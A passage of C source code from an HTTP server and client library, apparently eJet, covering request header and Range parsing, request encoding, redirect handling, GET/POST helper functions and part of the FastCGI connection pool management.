if (msg->GetLocFile(msg, NULL, 0, NULL, 0, udoc, sizeof(udoc)-1) == 2) {
return http_req_set_docuri(msg, udoc, strlen(udoc), 0, 0);
}
return 0;
}
/* resolve the uri to break down into all fields */
int http_req_set_uri (void * vmsg, char * puri, int urilen, int decode)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
if (!msg) return -1;
ret = http_uri_set(msg->uri, puri, urilen, decode);
if (ret < 0) return ret;
msg->req_url_type = msg->uri->type;
if (msg->req_methind == HTTP_METHOD_CONNECT) {
        /* It's a URL of the CONNECT method,
           e.g. CONNECT content-autofill.googleapis.com:443 */
msg->req_url_type = 0;
msg->req_host = msg->uri->host;
msg->req_hostlen = msg->uri->hostlen;
msg->req_port = msg->uri->port;
return 0;
}
msg->req_path = msg->uri->path;
msg->req_pathlen = msg->uri->pathlen;
msg->req_query = msg->uri->query;
msg->req_querylen = msg->uri->querylen;
if (msg->uri->type > 0) {
/* It's an absolute URL */
msg->ssl_link = msg->uri->ssl_link;
msg->req_scheme = msg->uri->scheme;
msg->req_schemelen = msg->uri->schemelen;
msg->req_host = msg->uri->host;
msg->req_hostlen = msg->uri->hostlen;
msg->req_port = msg->uri->port;
}
return ret;
}
static char * str2int64 (char * pbgn, char * pend, int64 * pval)
{
int64 val = 0;
for (val = 0; pbgn && pbgn < pend && isdigit(*pbgn); pbgn++) {
val *= 10; val += *pbgn-'0';
}
if (pval) *pval = val;
return pbgn;
}
static int partial_item_parse (void * vbgn, int len, http_partial_t * part)
{
char * pbgn = (char *)vbgn;
char * pend = pbgn + len;
/*
Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
if (isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->start);
if (*pbgn == '-') pbgn += 1;
if (pbgn < pend && isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->end);
part->partflag = 1;
part->length = part->end + 1 - part->start;
} else {
part->partflag = 2;
part->end = -1;
part->length = -1;
}
return 1;
} else if (*pbgn == '-') {
pbgn += 1;
if (pbgn < pend && isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->length);
part->partflag = 3;
part->start = -1;
part->end = -1;
return 2;
}
}
return -10;
}
int http_partial_parse (void * vmsg, void * vbgn, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_partial_t part;
char * pbgn = (char *)vbgn;
char * pend = NULL;
char * plist[16];
int plen[16];
int i, num = 0;
if (!msg) return -1;
pend = pbgn + len;
/* Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
if (strncasecmp(pbgn, "bytes", 5) != 0) return -2;
pbgn += 5;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (pbgn >= pend || *pbgn != '=') return -3;
pbgn += 1;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (pbgn >= pend) return -4;
num = string_tokenize(pbgn, pend - pbgn, ",;", 2, (void **)plist, plen, 16);
if (num <= 0) return -2;
for (i = 0; i < num; i++) {
memset(&part, 0, sizeof(part));
if (partial_item_parse(plist[i], plen[i], &part) >= 0)
vstar_push(msg->partial_list, &part);
}
msg->partial_flag = vstar_num(msg->partial_list);
return 0;
}
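/* Illustrative results of the parsing above (sketch), one http_partial_t per item:
       "bytes=0-499"        -> start=0,   end=499, length=500, partflag=1
       "bytes=500-"         -> start=500, end=-1,  length=-1,  partflag=2 (to end of file)
       "bytes=-200"         -> start=-1,  end=-1,  length=200, partflag=3 (last 200 bytes)
       "bytes=0-49,100-149" -> two entries pushed onto msg->partial_list */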
int http_req_parse_header (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
char * pover = NULL;
char * pcolon = NULL;
char * pend = NULL;
char * poct = NULL;
int ret = 0;
char * name = NULL;
char * value = NULL;
int namelen, valuelen;
if (!msg) return -1;
poct = frameP(msg->req_header_stream);
pover = poct + frameL(msg->req_header_stream);
poct = skipOver(poct, pover-poct, " \t\r\n", 4);
if (!poct || poct >= pover) return -100;
pend = memchr(poct, '\n', pover-poct);
if (!pend) return -100; /* has no line-terminal char */
ret = http_req_reqline_decode (msg, poct, pend-poct);
if (ret < 0) return -110;
for (poct = pend + 1; poct < pover; poct = pend + 1) {
pend = memchr(poct, '\n', pover - poct);
if (!pend || pend >= pover) break;
poct = skipOver(poct, pend-poct, " \t", 2);
if (!poct || poct >= pend) continue;
name = value = NULL; namelen = valuelen = 0;
name = poct;
pcolon = skipTo(poct, pend-poct, ":", 1);
if (!pcolon || pcolon>=pend) continue;
poct = rskipOver(pcolon-1, pcolon-name, " \t", 2);
if (poct >= name) namelen = poct-name+1;
else continue;
poct = skipOver(pcolon+1, pend-pcolon-1, " \t\r", 3);
if (poct >= pend) continue;
value = poct;
poct = rskipOver(pend-1, pend-poct, " \t\r", 3);
if (poct >= value) valuelen = poct-value+1;
else { value = NULL; valuelen = 0; }
http_header_add(msg, 0, name, namelen, value, valuelen);
}
http_req_parse_cookie(msg);
/* determine the body content format */
if (strncasecmp(msg->req_meth, "POST", 4) != 0 &&
strncasecmp(msg->req_meth, "PUT", 3) != 0)
{
if (strncasecmp(msg->req_meth, "CONNECT", 7) == 0)
msg->req_body_flag = BC_TUNNEL;
else
msg->req_body_flag = BC_NONE;
} else {
/* determine if the request body is encoded in the format of chunked */
punit = http_header_get(msg, 0, "Transfer-Encoding", -1);
if (punit) {
if (punit->valuelen != 7 ||
strncasecmp("chunked", HUValue(punit), 7) != 0)
{
msg->req_body_flag = BC_TE_INVALID;
} else {
msg->req_body_flag = BC_TE;
}
} else {
/* determine if the request body is counted in the format of Content-Length */
punit = http_header_get(msg, 0, "Content-Length", -1);
if (punit) {
msg->req_body_flag = BC_CONTENT_LENGTH;
msg->req_body_length = 0;
for (ret = 0; ret < punit->valuelen && !isdigit(*(HUValue(punit) + ret)); ret++);
for (; ret < punit->valuelen && isdigit(*(HUValue(punit) + ret)); ret++) {
msg->req_body_length *= 10;
msg->req_body_length += *(HUValue(punit) + ret) - '0';
}
} else {
msg->req_body_flag = BC_UNKNOWN;
}
}
}
/* determine if the request body is multipart form data */
punit = http_header_get(msg, 0, "Content-Type", -1);
if (punit) {
msg->req_content_type = HUValue(punit);
msg->req_contype_len = punit->valuelen;
if (strncasecmp(HUValue(punit), "multipart/form-data", 19) == 0)
msg->req_multipart = 1;
}
punit = http_header_get(msg, 0, "User-Agent", -1);
if (punit) {
msg->req_useragent = HUValue(punit);
msg->req_useragent_len = punit->valuelen;
}
/* determine if the request connection is keep-alive */
punit = http_header_get(msg, 0, "Proxy-Connection", -1);
if (punit) {
if (punit->valuelen == 10 && strncasecmp("keep-alive", HUValue(punit), 10) == 0) {
msg->req_conn_keepalive = 1;
} else {
msg->req_conn_keepalive = 0;
}
} else {
punit = http_header_get(msg, 0, "Connection", -1);
if (punit) {
            if (punit->valuelen == 10 && strncasecmp("keep-alive", HUValue(punit), 10) == 0) {
msg->req_conn_keepalive = 1;
} else {
msg->req_conn_keepalive = 0;
}
} else {
msg->req_conn_keepalive = 0;
}
}
/* parse http partial request header:
Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
punit = http_header_get(msg, 0, "Range", -1);
if (punit) {
http_partial_parse(msg, HUValue(punit), punit->valuelen);
}
if (msg->req_query && msg->req_querylen > 0) {
if (!msg->req_query_kvobj) {
msg->req_query_kvobj = kvpair_init(37, "&", "=");
}
kvpair_decode(msg->req_query_kvobj, msg->req_query, msg->req_querylen);
}
return 0;
}
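/* Summary of the body-flag decision made above: CONNECT requests are marked
   BC_TUNNEL; other non-POST/PUT methods get BC_NONE; POST/PUT with
   "Transfer-Encoding: chunked" get BC_TE (any other Transfer-Encoding value is
   BC_TE_INVALID); otherwise a Content-Length header yields BC_CONTENT_LENGTH with
   req_body_length parsed from its value, and BC_UNKNOWN is used as the fallback. */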
int http_req_verify (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (strncasecmp(msg->req_ver, "HTTP/", 5) != 0) {
msg->SetStatus(msg, 400, NULL);
msg->Reply(msg);
return -100;
}
if (msg->req_ver_major != 1) {
msg->SetStatus(msg, 505, NULL);
msg->Reply(msg);
return -101;
}
if (msg->req_ver_minor > 0) {
if (http_header_get(msg, 0, "Host", 4) == NULL) {
msg->SetStatus(msg, 400, NULL);
msg->Reply(msg);
return -102;
}
}
return 0;
}
int http_req_encoding (void * vmsg, int encode)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
int i;
int num;
char buf[256];
if (!msg) return -1;
mgmt = msg->httpmgmt;
frame_empty(msg->req_stream);
    /* check whether a proxy address is configured for the next request. if so, set dstip/dstport */
http_send_proxy_check(msg);
    /* regenerate the Host header */
http_header_del(msg, 0, "Host", 4);
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
if (!msg->ssl_link && msg->req_port != 80) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
} else if (msg->ssl_link && msg->req_port != 443) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
}
http_header_append(msg, 0, "Host", -1, buf, str_len(buf));
http_cookie_add(msg);
/* building request line */
frame_append(msg->req_stream, msg->req_meth);
frame_put_last(msg->req_stream, ' ');
if (msg->proxy) {
if (encode)
frame_uri_encode(msg->req_stream, frameP(msg->uri->uri), frameL(msg->uri->uri), NULL);
else
frame_put_nlast(msg->req_stream, frameP(msg->uri->uri), frameL(msg->uri->uri));
frame_put_last(msg->req_stream, ' ');
if (strlen(msg->req_ver) > 0)
frame_append(msg->req_stream, msg->req_ver);//mgmt->httpver1);
else
frame_append(msg->req_stream, mgmt->httpver1);
frame_put_nlast(msg->req_stream, "\r\n", 2);
} else {
if (msg->req_pathlen > 0 && msg->req_path) {
if (encode)
frame_uri_encode(msg->req_stream, msg->req_path, msg->req_pathlen, NULL);
else
frame_put_nlast(msg->req_stream, msg->req_path, msg->req_pathlen);
} else {
frame_append(msg->req_stream, "/");
}
if (msg->req_querylen > 0 && msg->req_query) {
frame_put_last(msg->req_stream, '?');
if (encode)
frame_uri_encode(msg->req_stream, msg->req_query, msg->req_querylen, NULL);
else
frame_put_nlast(msg->req_stream, msg->req_query, msg->req_querylen);
}
frame_put_last(msg->req_stream, ' ');
if (strlen(msg->req_ver) > 0)
frame_append(msg->req_stream, msg->req_ver);//mgmt->httpver1);
else
frame_append(msg->req_stream, mgmt->httpver1);
frame_append(msg->req_stream, "\r\n");
}
if (msg->msgtype == 0) { //HTTPMsg is sending request to origin
msg->req_line = frameP(msg->req_stream);
msg->req_line_len = frameL(msg->req_stream) - 2;
}
if (!msg->req_useragent || msg->req_useragent_len <= 0) {
punit = http_header_get(msg, 0, "User-Agent", -1);
if (punit) {
msg->req_useragent = HUValue(punit);
msg->req_useragent_len = punit->valuelen;
}
}
http_header_del(msg, 0, "Proxy-Connection", 16);
//http_header_del(msg, 0, "If-Modified-Since", 17);
//http_header_del(msg, 0, "If-None-Match", 13);
if (msg->req_body_flag == BC_NONE && msg->proxied == 0) {
        /* in proxy mode, do not remove body-format headers such as
           Transfer-Encoding or Content-Length */
http_header_del(msg, 0, "Content-Length", 14);
http_header_del(msg, 0, "Transfer-Encoding", 17);
}
    /* for a non-proxied HTTPMsg, check whether its body length equals the length of the body stream */
if (msg->req_body_flag == BC_CONTENT_LENGTH && msg->proxied == 0 &&
msg->req_body_length <= 0)
{
msg->req_body_length = chunk_size(msg->req_body_chunk, 0);
http_header_del(msg, 0, "Content-Length", -1);
http_header_append_int64(msg, 0, "Content-Length", 14, msg->req_body_length);
}
/* append all the headers */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
frame_put_nlast(msg->req_stream, HUName(punit), punit->namelen);
frame_put_nlast(msg->req_stream, ": ", 2);
if (HUValue(punit) && punit->valuelen > 0)
frame_put_nlast(msg->req_stream, HUValue(punit), punit->valuelen);
frame_put_nlast(msg->req_stream, "\r\n", 2);
}
/* append the trailer line of the http request header: a blank line */
frame_append(msg->req_stream, "\r\n");
msg->req_header_length = frameL(msg->req_stream);
msg->reqsent = 0;
msg->req_stream_sent = 0;
chunk_prepend_bufptr(msg->req_body_chunk, frameP(msg->req_stream), frameL(msg->req_stream), 1);
return 0;
}
int print_request (void * vmsg, FILE * fp)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * unit = NULL;
char buf[2048];
int len = 0;
int i, num;
char * poct = NULL;
    /* print the request line */
if (fp == stdout || fp == stderr)
fprintf(fp, "\n-------------Request ConID=%lu MsgID=%ld reqfd=%d peer_addr=%s:%d ---------------\n",
http_con_id(msg->pcon), msg->msgid,
iodev_fd(http_con_iodev(msg->pcon)),
msg->srcip, msg->srcport);
fprintf(fp, " SourceAddr: %s : %d\n", msg->srcip, msg->srcport);
if (msg->req_host && msg->req_hostlen > 0) {
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
fprintf(fp, " RemoteHost: %s : %d\n", buf, msg->req_port);
} else {
fprintf(fp, " RemoteHost: : %d\n", msg->req_port);
}
if (msg->req_path && msg->req_pathlen > 0) {
str_secpy(buf, sizeof(buf)-1, msg->uri->path, msg->uri->pathlen);
fprintf(fp, " %s %s", msg->req_meth, buf);
} else if (msg->req_methind == HTTP_METHOD_CONNECT) {
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
fprintf(fp, " %s %s:%d", msg->req_meth, buf, msg->req_port);
} else {
fprintf(fp, " %s <NULL>", msg->req_meth);
}
if (msg->req_querylen > 0 && msg->req_query) {
str_secpy(buf, sizeof(buf)-1, msg->req_query, msg->req_querylen);
fprintf(fp, "?%s", buf);
}
fprintf(fp, " %s\n", msg->req_ver);
    /* print the request headers */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
unit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!unit) continue;
poct = HUName(unit);
if (unit->namelen > 0) {
str_secpy(buf, sizeof(buf)-1, poct, unit->namelen);
fprintf(fp, " %s: ", buf);
} else fprintf(fp, " : ");
poct = HUValue(unit);
if (unit->valuelen > 0) {
str_secpy(buf, sizeof(buf)-1, poct, unit->valuelen);
fprintf(fp, "%s\n", buf);
} else fprintf(fp, "\n");
}
    /* print the request body */
if ((len = frameL(msg->req_body_stream)) > 0) {
fprintf(fp, "request body %d bytes:\n", frameL(msg->req_body_stream));
if (len > 256) len = 256;
printOctet(fp, frameP(msg->req_body_stream), 0, len, 2);
}
if (msg->req_file_cache > 0) {
printf("request body stored %lld bytes in file:\n", msg->req_body_length);
printf(" TempCacheFile: %s\n", msg->req_file_name);
}
print_hashtab(msg->req_header_table, fp);
if (fp == stdout || fp == stderr)
fprintf(fp, "--------------------------end of the request: id=%ld ------------------------\n", msg->msgid);
fflush(fp);
return 0;
}
<|start_filename|>src/http_do.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_chunk.h"
#include "http_srv.h"
#include "http_srv_io.h"
#include "http_con.h"
#include "http_request.h"
static char * hdr_accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
static char * hdr_accept_charset = "utf-8, iso-8859-1, utf-16, *;q=0.7";
static char * hdr_accept_lang = "zh-CN, en-US";
int http_redirect_request (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
char * p = NULL;
int len = 0;
frame_p uri;
if (!msg) return -1;
if (++msg->redirecttimes >= 6) {
msg->SetStatus(msg, 417, NULL);
msg->DelResHdr(msg, "Location", 8);
msg->DelResHdr(msg, "Content-Length", -1);
msg->DelResHdr(msg, "Transfer-Encoding", -1);
msg->DelResHdr(msg, "Content-Type", -1);
tolog(1, "eJet - Redirect: HTTP auto-redirect '%s' too many times.\n",
http_uri_string(msg->uri));
return -100;
}
    /* a 301/302 response may redirect to another origin server.
       msg->pcon is connected to the original server and is not reused to send the msg */
msg->GetResHdrP(msg, "Location", 8, &p, &len);
if (!p || len < 1) {
tolog(1, "eJet - Redirect: invalid Location returned from request '%s'.\n",
http_uri_string(msg->uri));
return -100;
}
if (strncasecmp(p, "http://", 7) != 0 &&
strncasecmp(p, "https://", 8) != 0 &&
*p != '/')
{
uri = frame_new(512);
frame_put_nlast(uri, msg->uri->baseuri, msg->uri->baseurilen);
if (frame_read(uri, frameL(uri)-1) != '/')
frame_put_last(uri, '/');
frame_put_nlast(uri, p, len);
msg->SetURL(msg, frameP(uri), frameL(uri), 1);
frame_free(uri);
} else {
msg->SetURL(msg, p, len, 1);
}
msg->dstport = msg->req_port;
/* the original Cookie should be removed before encoding */
http_header_del(msg, 0, "Cookie", -1);
http_chunk_zero(msg->req_chunk);
chunk_zero(msg->req_body_chunk);
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
http_msg_init_res(msg);
/* detach the msg from original httpcon */
pcon = msg->pcon;
http_con_msg_del(msg->pcon, msg);
if (pcon) {
/* debug http_con on 2020-10-20 */
http_con_close(pcon);
}
http_req_encoding(msg, 1);
msg->issued = 1;
chunk_set_end(msg->req_body_chunk);
if (http_srv_msg_dns(msg, http_srv_msg_dns_cb) < 0) {
http_msg_close(msg);
return -200;
}
return 0;
}
int do_http_request (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * fname = NULL;
char * mime = NULL;
if (!msg) return -1;
if (msg->req_body_flag == BC_CONTENT_LENGTH) {
if (http_header_get(msg, 0, "Content-Type", -1) == NULL) {
if (chunk_is_file(msg->req_body_chunk, NULL, NULL, NULL, &fname)) {
mime = http_get_mime(msg->httpmgmt, fname, NULL);
msg->SetReqContentType(msg, mime, strlen(mime));
} else {
msg->SetReqContentType(msg, "application/octet-stream", -1);
}
}
}
http_req_encoding(msg, 1);
msg->issued = 1;
chunk_set_end(msg->req_body_chunk);
    /* store the current thread id as workerid, so it can be set on the
       newly-created TCP iodev_t, ensuring that ePump I/O events are delivered
       to the current worker thread. */
msg->workerid = get_threadid();
if (http_srv_msg_dns(msg, http_srv_msg_dns_cb) < 0) {
http_msg_close(msg);
return -100;
}
return 0;
}
void * do_http_get_msg (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt || !url) return NULL;
if (urllen < 0) urllen = strlen(url);
if (urllen < 8) return NULL;
msg = http_msg_fetch(mgmt);
if (!msg) return NULL;
msg->SetMethod(msg, "GET", 3);
msg->SetURL(msg, url, urllen, 1);
msg->req_body_flag = BC_NONE;
msg->dstport = msg->req_port;
msg->SetResponseNotify(msg, resfunc, para, cbval, resfile, resoff,
rcvprocfunc, rcvpara, rcvcbval);
http_header_append(msg, 0, "Accept", -1, hdr_accept, strlen(hdr_accept));
http_header_append(msg, 0, "Accept-Charset", -1, hdr_accept_charset, strlen(hdr_accept_charset));
http_header_append(msg, 0, "Accept-Language", -1, hdr_accept_lang, strlen(hdr_accept_lang));
http_header_append(msg, 0, "Connection", -1, "keep-alive", -1);
http_header_append(msg, 0, "User-Agent", -1, mgmt->useragent, strlen(mgmt->useragent));
return msg;
}
void * do_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = do_http_get_msg(mgmt, url, urllen, resfunc, para, cbval,
rcvprocfunc, rcvpara, rcvcbval, resfile, resoff);
if (!msg) return NULL;
if (do_http_request(msg) < 0) {
http_msg_close(msg);
msg = NULL;
}
return msg;
}
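/* Illustrative caller sketch (an assumption-laden example, not from the original
   source: the exact signatures expected for resfunc/rcvprocfunc are defined elsewhere
   in http_msg.h, so the callback below is hypothetical):

       static int demo_res_notify (void * vmsg, void * para, void * cbval, int status)
       {
           // inspect the response carried by vmsg here
           return 0;
       }

       // after http_mgmt_alloc()/http_mgmt_init():
       do_http_get(mgmt, "http://www.example.com/index.html", -1,
                   demo_res_notify, NULL, NULL,   // response-complete notify
                   NULL, NULL, 0,                 // no receive-progress notify
                   NULL, 0);                      // response kept in memory, not a file
*/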
void * do_http_post_msg (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt || !url) return NULL;
if (urllen < 0) urllen = strlen(url);
if (urllen < 8) return NULL;
if (body && bodylen < 0) bodylen = strlen(body);
msg = http_msg_fetch(mgmt);
if (!msg) return NULL;
if ((body && bodylen > 0) || (fname && strlen(fname) > 0)) {
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
msg->req_body_flag = BC_CONTENT_LENGTH;
}
msg->SetMethod(msg, "POST", 4);
msg->SetURL(msg, url, urllen, 1);
msg->req_body_flag = BC_CONTENT_LENGTH;
msg->dstport = msg->req_port;
msg->SetResponseNotify(msg, resfunc, para, cbval, resfile, resoff,
rcvprocfunc, rcvpara, rcvcbval);
http_header_append(msg, 0, "Accept", -1, hdr_accept, strlen(hdr_accept));
http_header_append(msg, 0, "Accept-Charset", -1, hdr_accept_charset, strlen(hdr_accept_charset));
http_header_append(msg, 0, "Accept-Language", -1, hdr_accept_lang, strlen(hdr_accept_lang));
http_header_append(msg, 0, "Connection", -1, "keep-alive", -1);
if (http_header_get(msg, 0, "User-Agent", -1) == NULL)
http_header_append(msg, 0, "User-Agent", -1, mgmt->useragent, strlen(mgmt->useragent));
if (body && bodylen > 0)
msg->AddReqContent(msg, body, bodylen);
if (fname && strlen(fname) > 0)
msg->AddReqFile(msg, fname, offset, length);
if (sndprocfunc) {
msg->req_send_procnotify = sndprocfunc;
msg->req_send_procnotify_para = sndpara;
msg->req_send_procnotify_cbval = sndcbval;
}
if (mime) msg->SetReqContentType(msg, mime, strlen(mime));
return msg;
}
void * do_http_post (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = do_http_post_msg(mgmt, url, urllen, mime, body, bodylen,
fname, offset, length,
resfunc, para, cbval,
rcvprocfunc, rcvpara, rcvcbval,
sndprocfunc, sndpara, sndcbval,
resfile, resoff);
if (!msg) return NULL;
if (do_http_request(msg) < 0) {
http_msg_close(msg);
msg = NULL;
}
return msg;
}
<|start_filename|>src/http_fcgi_con.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_io.h"
extern HTTPMgmt * gp_httpmgmt;
int http_fcgicon_cmp_http_fcgicon(void * a, void * b)
{
FcgiCon * acon = (FcgiCon *)a;
FcgiCon * bcon = (FcgiCon *)b;
if (!acon || !bcon) return -1;
if (acon->conid == bcon->conid) return 0;
if (acon->conid > bcon->conid) return 1;
return -1;
}
int http_fcgicon_cmp_conid (void * a, void * pat)
{
FcgiCon * pcon = (FcgiCon *)a;
ulong cid = *(ulong *)pat;
if (!pcon || !pat) return -1;
if (pcon->conid == cid) return 0;
if (pcon->conid > cid) return 1;
return -1;
}
ulong http_fcgicon_hash_func (void * key)
{
ulong cid = *(ulong *)key;
return cid;
}
int http_fcgicon_init (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
pcon->conid = 0;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
memset(&pcon->dstip, 0, sizeof(pcon->dstip));
pcon->dstport = 0;
InitializeCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
if (pcon->rcvstream == NULL)
pcon->rcvstream = frame_new(8192);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->stamp = 0;
pcon->createtime = 0;
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
pcon->retrytimes = 0;
pcon->reqnum = 0;
pcon->resnum = 0;
pcon->keepalive = 0;
if (pcon->msg) {
http_fcgimsg_close(pcon->msg);
pcon->msg = NULL;
}
InitializeCriticalSection(&pcon->msglistCS);
if (pcon->msg_list == NULL) {
pcon->msg_list = arr_new(4);
}
while (arr_num(pcon->msg_list) > 0)
http_fcgimsg_close(arr_pop(pcon->msg_list));
arr_zero(pcon->msg_list);
return 0;
}
int http_fcgicon_free (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
if (pcon->msg) {
http_fcgimsg_close(pcon->msg);
pcon->msg = NULL;
}
DeleteCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
frame_delete(&pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
DeleteCriticalSection(&pcon->msglistCS);
while (arr_num(pcon->msg_list) > 0) {
if (pcon->srv)
http_fcgisrv_msg_push(pcon->srv, arr_pop(pcon->msg_list));
else
http_fcgimsg_close(arr_pop(pcon->msg_list));
}
arr_free(pcon->msg_list);
return 0;
}
void * http_fcgicon_fetch (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
pcon = mpool_fetch(mgmt->fcgicon_pool);
if (!pcon) {
pcon = kzalloc(sizeof(*pcon));
if (!pcon) return NULL;
http_fcgicon_init(pcon);
}
pcon->conid = http_fcgisrv_get_conid(srv);
pcon->srv = srv;
pcon->pcore = srv->pcore;
return pcon;
}
int http_fcgicon_recycle (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiSrv * srv = NULL;
FcgiMsg * msg = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
srv = (FcgiSrv *)pcon->srv;
if (!srv) return -2;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return -3;
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
http_fcgimsg_close(msg);
}
arr_zero(pcon->msg_list);
pcon->msg = NULL;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
if (frame_size(pcon->rcvstream) > 16384)
frame_delete(&pcon->rcvstream);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
if (mgmt->fcgicon_pool)
mpool_recycle(mgmt->fcgicon_pool, pcon);
else
http_fcgicon_free(pcon);
return 0;
}
int http_fcgicon_close (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
if (http_fcgisrv_con_del(pcon->srv, pcon->conid) != pcon) {
return -2;
}
return http_fcgicon_recycle(pcon);
}
void * http_fcgicon_open (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
pcon = http_fcgicon_fetch(srv);
if (!pcon) return NULL;
pcon->socktype = srv->socktype;
strcpy(pcon->unixsock, srv->unixsock);
strcpy(pcon->dstip, srv->ip);
pcon->dstport = srv->port;
time(&pcon->stamp);
if (http_fcgicon_connect(pcon) < 0) {
return NULL;
}
http_fcgisrv_con_add(srv, pcon);
return pcon;
